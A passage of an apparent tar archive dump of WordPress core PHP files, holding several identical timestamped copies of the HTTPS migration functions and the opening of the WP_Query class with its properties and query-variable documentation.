* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-migration-20260605140532.php 0000666 00000011205 15224151221 0011765 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-migration-20260605132821-20260621081201.php 0000666 00000011205 15224151221 0013343 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-migration-20260606084244.php 0000666 00000011205 15224151221 0011775 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
class-wp-query-20260621134858-20260710024633.php 0000666 00000477640 15224151221 0013150 0 ustar 00 <?php
/**
* Query API: WP_Query class
*
* @package WordPress
* @subpackage Query
* @since 4.7.0
*/
/**
* The WordPress Query class.
*
* @link https://developer.wordpress.org/reference/classes/wp_query/
*
* @since 1.5.0
* @since 4.5.0 Removed the `$comments_popup` property.
*/
#[AllowDynamicProperties]
class WP_Query {
/**
* Query vars set by the user.
*
* @since 1.5.0
* @var array
*/
public $query;
/**
* Query vars, after parsing.
*
* @since 1.5.0
* @var array
*/
public $query_vars = array();
/**
* Taxonomy query, as passed to get_tax_sql().
*
* @since 3.1.0
* @var WP_Tax_Query|null A taxonomy query instance.
*/
public $tax_query;
/**
* Metadata query container.
*
* @since 3.2.0
* @var WP_Meta_Query A meta query instance.
*/
public $meta_query = false;
/**
* Date query container.
*
* @since 3.7.0
* @var WP_Date_Query A date query instance.
*/
public $date_query = false;
/**
* Holds the data for a single object that is queried.
*
* Holds the contents of a post, page, category, attachment.
*
* @since 1.5.0
* @var WP_Term|WP_Post_Type|WP_Post|WP_User|null
*/
public $queried_object;
/**
* The ID of the queried object.
*
* @since 1.5.0
* @var int
*/
public $queried_object_id;
/**
* SQL for the database query.
*
* @since 2.0.1
* @var string
*/
public $request;
/**
* Array of post objects or post IDs.
*
* @since 1.5.0
* @var WP_Post[]|int[]
*/
public $posts;
/**
* The number of posts for the current query.
*
* @since 1.5.0
* @var int
*/
public $post_count = 0;
/**
* Index of the current item in the loop.
*
* @since 1.5.0
* @var int
*/
public $current_post = -1;
/**
* Whether the caller is before the loop.
*
* @since 6.3.0
* @var bool
*/
public $before_loop = true;
/**
* Whether the loop has started and the caller is in the loop.
*
* @since 2.0.0
* @var bool
*/
public $in_the_loop = false;
/**
* The current post.
*
* This property does not get populated when the `fields` argument is set to
* `ids` or `id=>parent`.
*
* @since 1.5.0
* @var WP_Post|null
*/
public $post;
/**
* The list of comments for current post.
*
* @since 2.2.0
* @var WP_Comment[]
*/
public $comments;
/**
* The number of comments for the posts.
*
* @since 2.2.0
* @var int
*/
public $comment_count = 0;
/**
* The index of the comment in the comment loop.
*
* @since 2.2.0
* @var int
*/
public $current_comment = -1;
/**
* Current comment object.
*
* @since 2.2.0
* @var WP_Comment
*/
public $comment;
/**
* The number of found posts for the current query.
*
* If limit clause was not used, equals $post_count.
*
* @since 2.1.0
* @var int
*/
public $found_posts = 0;
/**
* The number of pages.
*
* @since 2.1.0
* @var int
*/
public $max_num_pages = 0;
/**
* The number of comment pages.
*
* @since 2.7.0
* @var int
*/
public $max_num_comment_pages = 0;
/**
* Signifies whether the current query is for a single post.
*
* @since 1.5.0
* @var bool
*/
public $is_single = false;
/**
* Signifies whether the current query is for a preview.
*
* @since 2.0.0
* @var bool
*/
public $is_preview = false;
/**
* Signifies whether the current query is for a page.
*
* @since 1.5.0
* @var bool
*/
public $is_page = false;
/**
* Signifies whether the current query is for an archive.
*
* @since 1.5.0
* @var bool
*/
public $is_archive = false;
/**
* Signifies whether the current query is for a date archive.
*
* @since 1.5.0
* @var bool
*/
public $is_date = false;
/**
* Signifies whether the current query is for a year archive.
*
* @since 1.5.0
* @var bool
*/
public $is_year = false;
/**
* Signifies whether the current query is for a month archive.
*
* @since 1.5.0
* @var bool
*/
public $is_month = false;
/**
* Signifies whether the current query is for a day archive.
*
* @since 1.5.0
* @var bool
*/
public $is_day = false;
/**
* Signifies whether the current query is for a specific time.
*
* @since 1.5.0
* @var bool
*/
public $is_time = false;
/**
* Signifies whether the current query is for an author archive.
*
* @since 1.5.0
* @var bool
*/
public $is_author = false;
/**
* Signifies whether the current query is for a category archive.
*
* @since 1.5.0
* @var bool
*/
public $is_category = false;
/**
* Signifies whether the current query is for a tag archive.
*
* @since 2.3.0
* @var bool
*/
public $is_tag = false;
/**
* Signifies whether the current query is for a taxonomy archive.
*
* @since 2.5.0
* @var bool
*/
public $is_tax = false;
/**
* Signifies whether the current query is for a search.
*
* @since 1.5.0
* @var bool
*/
public $is_search = false;
/**
* Signifies whether the current query is for a feed.
*
* @since 1.5.0
* @var bool
*/
public $is_feed = false;
/**
* Signifies whether the current query is for a comment feed.
*
* @since 2.2.0
* @var bool
*/
public $is_comment_feed = false;
/**
* Signifies whether the current query is for trackback endpoint call.
*
* @since 1.5.0
* @var bool
*/
public $is_trackback = false;
/**
* Signifies whether the current query is for the site homepage.
*
* @since 1.5.0
* @var bool
*/
public $is_home = false;
/**
* Signifies whether the current query is for the Privacy Policy page.
*
* @since 5.2.0
* @var bool
*/
public $is_privacy_policy = false;
/**
* Signifies whether the current query couldn't find anything.
*
* @since 1.5.0
* @var bool
*/
public $is_404 = false;
/**
* Signifies whether the current query is for an embed.
*
* @since 4.4.0
* @var bool
*/
public $is_embed = false;
/**
* Signifies whether the current query is for a paged result and not for the first page.
*
* @since 1.5.0
* @var bool
*/
public $is_paged = false;
/**
* Signifies whether the current query is for an administrative interface page.
*
* @since 1.5.0
* @var bool
*/
public $is_admin = false;
/**
* Signifies whether the current query is for an attachment page.
*
* @since 2.0.0
* @var bool
*/
public $is_attachment = false;
/**
* Signifies whether the current query is for an existing single post of any post type
* (post, attachment, page, custom post types).
*
* @since 2.1.0
* @var bool
*/
public $is_singular = false;
/**
* Signifies whether the current query is for the robots.txt file.
*
* @since 2.1.0
* @var bool
*/
public $is_robots = false;
/**
* Signifies whether the current query is for the favicon.ico file.
*
* @since 5.4.0
* @var bool
*/
public $is_favicon = false;
/**
* Signifies whether the current query is for the page_for_posts page.
*
* Basically, the homepage if the option isn't set for the static homepage.
*
* @since 2.1.0
* @var bool
*/
public $is_posts_page = false;
/**
* Signifies whether the current query is for a post type archive.
*
* @since 3.1.0
* @var bool
*/
public $is_post_type_archive = false;
/**
* Stores the ->query_vars state like md5(serialize( $this->query_vars ) ) so we know
* whether we have to re-parse because something has changed
*
* @since 3.1.0
* @var bool|string
*/
private $query_vars_hash = false;
/**
* Whether query vars have changed since the initial parse_query() call. Used to catch modifications to query vars made
* via pre_get_posts hooks.
*
* @since 3.1.1
* @var bool
*/
private $query_vars_changed = true;
/**
* Set if post thumbnails are cached
*
* @since 3.2.0
* @var bool
*/
public $thumbnails_cached = false;
/**
* Controls whether an attachment query should include filenames or not.
*
* @since 6.0.3
* @var bool
*/
protected $allow_query_attachment_by_filename = false;
/**
* Cached list of search stopwords.
*
* @since 3.7.0
* @var array
*/
private $stopwords;
private $compat_fields = array( 'query_vars_hash', 'query_vars_changed' );
private $compat_methods = array( 'init_query_flags', 'parse_tax_query' );
/**
* The cache key generated by the query.
*
* The cache key is generated by the method ::generate_cache_key() after the
* query has been normalized.
*
* @since 6.8.0
* @var string
*/
private $query_cache_key = '';
/**
* Resets query flags to false.
*
* The query flags are what page info WordPress was able to figure out.
*
* @since 2.0.0
*/
private function init_query_flags() {
$this->is_single = false;
$this->is_preview = false;
$this->is_page = false;
$this->is_archive = false;
$this->is_date = false;
$this->is_year = false;
$this->is_month = false;
$this->is_day = false;
$this->is_time = false;
$this->is_author = false;
$this->is_category = false;
$this->is_tag = false;
$this->is_tax = false;
$this->is_search = false;
$this->is_feed = false;
$this->is_comment_feed = false;
$this->is_trackback = false;
$this->is_home = false;
$this->is_privacy_policy = false;
$this->is_404 = false;
$this->is_paged = false;
$this->is_admin = false;
$this->is_attachment = false;
$this->is_singular = false;
$this->is_robots = false;
$this->is_favicon = false;
$this->is_posts_page = false;
$this->is_post_type_archive = false;
}
/**
* Initiates object properties and sets default values.
*
* @since 1.5.0
*/
public function init() {
unset( $this->posts );
unset( $this->query );
$this->query_vars = array();
unset( $this->queried_object );
unset( $this->queried_object_id );
$this->post_count = 0;
$this->current_post = -1;
$this->in_the_loop = false;
$this->before_loop = true;
unset( $this->request );
unset( $this->post );
unset( $this->comments );
unset( $this->comment );
$this->comment_count = 0;
$this->current_comment = -1;
$this->found_posts = 0;
$this->max_num_pages = 0;
$this->max_num_comment_pages = 0;
$this->init_query_flags();
}
/**
* Reparses the query vars.
*
* @since 1.5.0
*/
public function parse_query_vars() {
$this->parse_query();
}
/**
* Fills in the query variables, which do not exist within the parameter.
*
* @since 2.1.0
* @since 4.5.0 Removed the `comments_popup` public query variable.
*
* @param array $query_vars Defined query variables.
* @return array Complete query variables with undefined ones filled in empty.
*/
public function fill_query_vars( $query_vars ) {
$keys = array(
'error',
'm',
'p',
'post_parent',
'subpost',
'subpost_id',
'attachment',
'attachment_id',
'name',
'pagename',
'page_id',
'second',
'minute',
'hour',
'day',
'monthnum',
'year',
'w',
'category_name',
'tag',
'cat',
'tag_id',
'author',
'author_name',
'feed',
'tb',
'paged',
'meta_key',
'meta_value',
'preview',
's',
'sentence',
'title',
'fields',
'menu_order',
'embed',
);
foreach ( $keys as $key ) {
if ( ! isset( $query_vars[ $key ] ) ) {
$query_vars[ $key ] = '';
}
}
$array_keys = array(
'category__in',
'category__not_in',
'category__and',
'post__in',
'post__not_in',
'post_name__in',
'tag__in',
'tag__not_in',
'tag__and',
'tag_slug__in',
'tag_slug__and',
'post_parent__in',
'post_parent__not_in',
'author__in',
'author__not_in',
'search_columns',
);
foreach ( $array_keys as $key ) {
if ( ! isset( $query_vars[ $key ] ) ) {
$query_vars[ $key ] = array();
}
}
return $query_vars;
}
/**
* Parses a query string and sets query type booleans.
*
* @since 1.5.0
* @since 4.2.0 Introduced the ability to order by specific clauses of a `$meta_query`, by passing the clause's
* array key to `$orderby`.
* @since 4.4.0 Introduced `$post_name__in` and `$title` parameters. `$s` was updated to support excluded
* search terms, by prepending a hyphen.
* @since 4.5.0 Removed the `$comments_popup` parameter.
* Introduced the `$comment_status` and `$ping_status` parameters.
* Introduced `RAND(x)` syntax for `$orderby`, which allows an integer seed value to random sorts.
* @since 4.6.0 Added 'post_name__in' support for `$orderby`. Introduced the `$lazy_load_term_meta` argument.
* @since 4.9.0 Introduced the `$comment_count` parameter.
* @since 5.1.0 Introduced the `$meta_compare_key` parameter.
* @since 5.3.0 Introduced the `$meta_type_key` parameter.
* @since 6.1.0 Introduced the `$update_menu_item_cache` parameter.
* @since 6.2.0 Introduced the `$search_columns` parameter.
*
* @param string|array $query {
* Optional. Array or string of Query parameters.
*
* @type int $attachment_id Attachment post ID. Used for 'attachment' post_type.
* @type int|string $author Author ID, or comma-separated list of IDs.
* @type string $author_name User 'user_nicename'.
* @type int[] $author__in An array of author IDs to query from.
* @type int[] $author__not_in An array of author IDs not to query from.
* @type bool $cache_results Whether to cache post information. Default true.
* @type int|string $cat Category ID or comma-separated list of IDs (this or any children).
* @type int[] $category__and An array of category IDs (AND in).
* @type int[] $category__in An array of category IDs (OR in, no children).
* @type int[] $category__not_in An array of category IDs (NOT in).
* @type string $category_name Use category slug (not name, this or any children).
* @type array|int $comment_count Filter results by comment count. Provide an integer to match
* comment count exactly. Provide an array with integer 'value'
* and 'compare' operator ('=', '!=', '>', '>=', '<', '<=' ) to
* compare against comment_count in a specific way.
* @type string $comment_status Comment status.
* @type int $comments_per_page The number of comments to return per page.
* Default 'comments_per_page' option.
* @type array $date_query An associative array of WP_Date_Query arguments.
* See WP_Date_Query::__construct().
* @type int $day Day of the month. Default empty. Accepts numbers 1-31.
* @type bool $exact Whether to search by exact keyword. Default false.
* @type string $fields Post fields to query for. Accepts:
* - '' Returns an array of complete post objects (`WP_Post[]`).
* - 'ids' Returns an array of post IDs (`int[]`).
* - 'id=>parent' Returns an associative array of parent post IDs,
* keyed by post ID (`int[]`).
* Default ''.
* @type int $hour Hour of the day. Default empty. Accepts numbers 0-23.
* @type int|bool $ignore_sticky_posts Whether to ignore sticky posts or not. Setting this to false
* excludes stickies from 'post__in'. Accepts 1|true, 0|false.
* Default false.
* @type int $m Combination YearMonth. Accepts any four-digit year and month
* numbers 01-12. Default empty.
* @type string|string[] $meta_key Meta key or keys to filter by.
* @type string|string[] $meta_value Meta value or values to filter by.
* @type string $meta_compare MySQL operator used for comparing the meta value.
* See WP_Meta_Query::__construct() for accepted values and default value.
* @type string $meta_compare_key MySQL operator used for comparing the meta key.
* See WP_Meta_Query::__construct() for accepted values and default value.
* @type string $meta_type MySQL data type that the meta_value column will be CAST to for comparisons.
* See WP_Meta_Query::__construct() for accepted values and default value.
* @type string $meta_type_key MySQL data type that the meta_key column will be CAST to for comparisons.
* See WP_Meta_Query::__construct() for accepted values and default value.
* @type array $meta_query An associative array of WP_Meta_Query arguments.
* See WP_Meta_Query::__construct() for accepted values.
* @type int $menu_order The menu order of the posts.
* @type int $minute Minute of the hour. Default empty. Accepts numbers 0-59.
* @type int $monthnum The two-digit month. Default empty. Accepts numbers 1-12.
* @type string $name Post slug.
* @type bool $nopaging Show all posts (true) or paginate (false). Default false.
* @type bool $no_found_rows Whether to skip counting the total rows found. Enabling can improve
* performance. Default false.
* @type int $offset The number of posts to offset before retrieval.
* @type string $order Designates ascending or descending order of posts. Default 'DESC'.
* Accepts 'ASC', 'DESC'.
* @type string|array $orderby Sort retrieved posts by parameter. One or more options may be passed.
* To use 'meta_value', or 'meta_value_num', 'meta_key=keyname' must be
* also be defined. To sort by a specific `$meta_query` clause, use that
* clause's array key. Accepts:
* - 'none'
* - 'name'
* - 'author'
* - 'date'
* - 'title'
* - 'modified'
* - 'menu_order'
* - 'parent'
* - 'ID'
* - 'rand'
* - 'relevance'
* - 'RAND(x)' (where 'x' is an integer seed value)
* - 'comment_count'
* - 'meta_value'
* - 'meta_value_num'
* - 'post__in'
* - 'post_name__in'
* - 'post_parent__in'
* - The array keys of `$meta_query`.
* Default is 'date', except when a search is being performed, when
* the default is 'relevance'.
* @type int $p Post ID.
* @type int $page Show the number of posts that would show up on page X of a
* static front page.
* @type int $paged The number of the current page.
* @type int $page_id Page ID.
* @type string $pagename Page slug.
* @type string $perm Show posts if user has the appropriate capability.
* @type string $ping_status Ping status.
* @type int[] $post__in An array of post IDs to retrieve, sticky posts will be included.
* @type int[] $post__not_in An array of post IDs not to retrieve. Note: a string of comma-
* separated IDs will NOT work.
* @type string $post_mime_type The mime type of the post. Used for 'attachment' post_type.
* @type string[] $post_name__in An array of post slugs that results must match.
* @type int $post_parent Page ID to retrieve child pages for. Use 0 to only retrieve
* top-level pages.
* @type int[] $post_parent__in An array containing parent page IDs to query child pages from.
* @type int[] $post_parent__not_in An array containing parent page IDs not to query child pages from.
* @type string|string[] $post_type A post type slug (string) or array of post type slugs.
* Default 'any' if using 'tax_query'.
* @type string|string[] $post_status A post status (string) or array of post statuses.
* @type int $posts_per_page The number of posts to query for. Use -1 to request all posts.
* @type int $posts_per_archive_page The number of posts to query for by archive page. Overrides
* 'posts_per_page' when is_archive(), or is_search() are true.
* @type string $s Search keyword(s). Prepending a term with a hyphen will
* exclude posts matching that term. Eg, 'pillow -sofa' will
* return posts containing 'pillow' but not 'sofa'. The
* character used for exclusion can be modified using the
* the 'wp_query_search_exclusion_prefix' filter.
* @type string[] $search_columns Array of column names to be searched. Accepts 'post_title',
* 'post_excerpt' and 'post_content'. Default empty array.
* @type int $second Second of the minute. Default empty. Accepts numbers 0-59.
* @type bool $sentence Whether to search by phrase. Default false.
* @type bool $suppress_filters Whether to suppress filters. Default false.
* @type string $tag Tag slug. Comma-separated (either), Plus-separated (all).
* @type int[] $tag__and An array of tag IDs (AND in).
* @type int[] $tag__in An array of tag IDs (OR in).
* @type int[] $tag__not_in An array of tag IDs (NOT in).
* @type int $tag_id Tag id or comma-separated list of IDs.
* @type string[] $tag_slug__and An array of tag slugs (AND in).
* @type string[] $tag_slug__in An array of tag slugs (OR in). unless 'ignore_sticky_posts' is
* true. Note: a string of comma-separated IDs will NOT work.
* @type array $tax_query An associative array of WP_Tax_Query arguments.
* See WP_Tax_Query::__construct().
* @type string $title Post title.
